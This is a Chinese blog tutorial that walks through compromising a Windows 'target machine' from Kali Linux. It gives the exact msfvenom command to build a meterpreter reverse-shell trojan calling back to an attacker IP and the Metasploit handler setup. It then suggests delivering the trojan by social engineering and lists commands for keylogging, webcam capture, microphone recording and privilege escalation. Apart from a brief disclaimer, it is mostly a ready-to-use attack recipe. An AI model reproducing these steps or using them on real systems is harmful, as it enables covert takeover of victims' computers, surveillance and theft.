记一次Kali系统渗透靶机(物理机)的详细过程(渗透必备)

声明:本文仅做学习与交流,任何用于非法用途、行为等造成他人损失的,责任自负。本文不承担任何法律责任。

很多人对黑客可能都是这样的印象,低调的穿着,修长的手指快速的在键盘上敲击,界面各种日志不断在打印,但是你有想过黑客用的是什么操作系统吗?windows或者linux?

实际上,很多黑客用的操作系统都是Kali linux,也是一种linux的发行版。

Kali linux系统包含了600多款渗透测试工具,今天我们就给大家分享一次Kali系统渗透靶机的详细过程。

生成木马文件

首先打开我们安装好的Kali系统,打开终端;界面如下图所示:

记一次Kali系统渗透靶机(物理机)的详细过程(渗透必备)_第1张图片

输入命令:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.184 lport=4444 -f exe -o /root/Desktop/aaa.exe

桌面生成一个aaa.exe木马文件;如下图箭头所示:

记一次Kali系统渗透靶机(物理机)的详细过程(渗透必备)_第2张图片

执行监听

首先输入msfconsole进入msf控制台;

使用exploit/multi/handler

use exploit/multi/handler

设置payload 

set payload windows/meterpreter/reverse_tcp

设置木马监听回传ip地址

set lhost 192.168.43.184

设置木马监听回传端口

set lport 4444

命令列表如下:

记一次Kali系统渗透靶机(物理机)的详细过程(渗透必备)_第3张图片

展示options设置,最后对比设置,监听会传ip以及端口是否正确。截图所下:

记一次Kali系统渗透靶机(物理机)的详细过程(渗透必备)_第4张图片

最后攻击夺得靶机控制权

我们可以利用社会工程学的知识,把木马病毒传播给靶机;

记一次Kali系统渗透靶机(物理机)的详细过程(渗透必备)_第5张图片

然后回到我们的的kali渗透机环境,然后输入run监听我们的木马程序回传;

打开任务管理器,看到我们的木马程序已经启动

记一次Kali系统渗透靶机(物理机)的详细过程(渗透必备)_第6张图片

这时候看到我们的kali渗透机已经捕捉到靶机木马回传的信息,当出现下图红框中的信息,就说明我们的入侵已经成功。可以开始控制靶机电脑内容了。

记一次Kali系统渗透靶机(物理机)的详细过程(渗透必备)_第7张图片

例如我们输入sysinfo命令,就可以列出靶机计算机的属性信息。

记一次Kali系统渗透靶机(物理机)的详细过程(渗透必备)_第8张图片

具体的命令以及操作可以输入-help来查看具体的命令列表:

记一次Kali系统渗透靶机(物理机)的详细过程(渗透必备)_第9张图片

比较常用的命令就是截取当前靶机正在浏览的界面,还有调取摄像头,以及越权提权等命令。

getuid    获取系统ID以及计算机名称
kill    中止进程
ps    列举正在运行中的进程
getpid    获取当前进程标识符
keyscan_start     开启按键记录会话
keyscan_stop     终止按键记录会话
keyscan_dump   转储从被攻击主机捕获到的按键
enumdesktops    列举所有可访问到的桌面和工作站
getdesktop    获取当前meterpreter桌面
setdesktop    变更meterpreter当前桌面
webcam_list   列举系统中所有的摄像头
webcam_snap   捕获被攻击主机的快照
record_mic    从主机的默认麦克风中记录环境声音

下期分享怎么在VM虚拟机中安装kali linux系统。

相关阅读:

怎么在VM虚拟机中安装kali linux系统

niko工具的用法描述(漏洞分析)

Sparta工具用法描述之信息收集(漏洞分析)


由于水平有限,本博客难免有不足,恳请各位大佬不吝赐教!!!

你可能感兴趣的:(网络安全)